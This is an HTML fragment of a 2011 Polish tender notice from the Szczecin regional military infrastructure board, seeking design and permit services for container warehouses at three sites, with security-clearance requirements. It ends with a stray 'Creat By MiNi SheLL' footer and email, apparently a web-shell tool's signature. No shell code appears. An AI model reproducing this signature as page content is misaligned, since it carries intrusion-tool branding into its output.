<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości   2 900,00 PLN  (art. 45, 46)   dla całości zamówienia, w    tym:
              dla części I:    	1 000,00 PLN
	           dla części II:              950,00  PLN
              dla części III:    	  950,00  PLN

Zamawiający wymaga wniesienia Zabezpieczenia Należytego Wykonania Umowy (ZNWU) w wysokości  10  % ceny całkowitej podanej w ofercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności  w zakresie pozwalającym na realizację zadania tj. posiadają Świadectwo Bezpieczeństwa Przemysłowego I stopnia o którym mowa w art. 55 ust. 1 pkt. 1 i 2 ustawy z dn. 05.08.2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., nr 182, poz. 1228).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie pozwalające na realizację zamówienia, tj. . w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie w/w zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie nabyli wiedzę i doświadczenie wykonując  usługi polegające na wykonaniu programów inwestycyjnych wraz z dokumentacją projektową, częścią kosztową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych, pozyskali pozwolenie na budowę oraz pełnili nadzór autorski o łącznej wartości minimum: 400 000,00 zł brutto, w tym jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia o wartości minimum 40.000 zł brutto wraz z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie (Rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009 r. Dz. U. nr 226 poz.1817-  §1, ust.1, pkt  3).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. osobami które będą uczestniczyć w wykonywaniu zamówienia - odpowiedzialnymi za świadczenie usług, posiadającymi  ważne poświadczenia bezpieczeństwa do poziomu co najmniej POUFNE oraz zaświadczenia stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych dla:

 -  pełnomocnika ds.  ochrony informacji niejawnych
 -  osób posiadających uprawnienia:
       a)  projektowe  w specjalności architektonicznej - 1 osoba
       b) projektowe  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elekrtycznych i elektroenergetycznych - 1 osoba
       c)  projektowe w specjalności konstrukcyjno- budowlanej - 1 osoba
       d)  w zakresie projektowania systemów alarmowych klasy SA-4 - min. 1 osoba
       e)  geodezyjne - 1 osoba</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ich  sytuacja ekonomiczna i finansowa zapewnia wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o posiadaniu Świadectwa Bezpieczeństwa Przemysłowego I stopnia.

2. Wykaz osób, określonych w części VII SIWZ ust. 1 pkt. 3 posiadających ważne poświadczenia bezpieczeństwa, które upoważniają do dostępu do informacji niejawnych o klauzuli co najmniej POUFNE oraz zaświadczenia o odbyciu szkolenia z zasad ochrony informacji niejawnych (na podstawie Ustawy z dnia 05.08.2010 r. o ochronie informacji niejawnych - art.14, 15) tj.: 
a) kierownik firmy, 
b) pełnomocnik ds. ochrony informacji niejawnych, 
c) min. 1 osoba  posiadająca uprawnienia projektowe w specjalności architektonicznej 
d) min. 1 osoba  posiadająca uprawnienia  projektowe w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń elekrtycznych i elektroenergetycznych 
e) min. 1 osoba  posiadająca uprawnienia  projektowe w specjalności konstrukcyjno- budowlanej 
f) min. 1 osoba posiadająca uprawnienia geodezyjne, 
g) min. 1 osoba posiadająca świadectwo ukończenia kursu w zakresie projektowania systemów alarmowych klasy SA-4, 

Wykaz ma zawierać numery poświadczeń bezpieczeństwa i datę ich ważności, oraz numery zaświadczeń stwierdzających odbycie szkolenia w zakresie ochrony informacji niejawnych w/w osób. Ponadto do wykazu należy załączyć oświadczenie, iż wszystkie w/w osoby posiadają ważne poświadczenia bezpieczeństwa do poziomu co najmniej POUFNE oraz odbyły przeszkolenie w zakresie ochrony informacji niejawnych (wzór załącznik nr 5 do SIWZ) oraz oświadczenie o posiadaniu pełnomocnika ds. ochrony informacji niejawnych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku:

1)	Urzędowej zmiany wysokości podatku VAT
2)	Zmiany terminu realizacji w przypadku wystąpienia nieprzewidywalnych, koniecznych do wykonania zadania usług  poprzez udzielenie zamówień dodatkowych.
3)	Zmiany terminu realizacji w przypadku przedłużającego się terminu uzyskania ostatecznej decyzji pozwolenia na budowę z przyczyn niezależnych od Wykonawcy.
4)	Zmiany wartości wynagrodzenia w przypadku usług zaniechanych 
5)	Zmiany limitu finansowego w danym roku budżetowym
6)	Zmiany wynikające z błędów programu inwestycyjnego
7)	Zmiany spowodowane okolicznościami siły wyższej lub powstałe z winy osób trzecich.
8)	Zmiany technologii wykonania części robót  przynoszące korzyści Zamawiającemu, polepszające jakość  użytkowania, bezpieczeństwo użytkowania
9)	Zmiany ilości faktur w sytuacji nieprzewidzianej po wcześniejszym uzgodnieniu z Zamawiającym.

 - w przypadku wystąpienia sytuacji powodujących konieczność wprowadzenia takich zmian,
    zostaną wprowadzone do umowy aneksem na warunkach uzgodnionych przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.rzi.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, Narutowicza 17B, 70-240 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2011 godzina 10:00, miejsce: kancelaria Rejonowego Zarządu  Infrastruktury w  Szczecinie -  pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dziwnów - dwa kontenery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 165.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szczecin Podjuchy - jeden kontener.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 165.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świnoujście (teren Portu Wojennego) - jeden kontener..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polegająca na wykonaniu programów inwestycji wraz z dokumentacjami projektowymi, częścią kosztową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, uzyskaniu decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych według sporządzonej dokumentacji na realizację zadania  Przygotowanie infrastruktury do montażu kontenerowych magazynów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 165.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com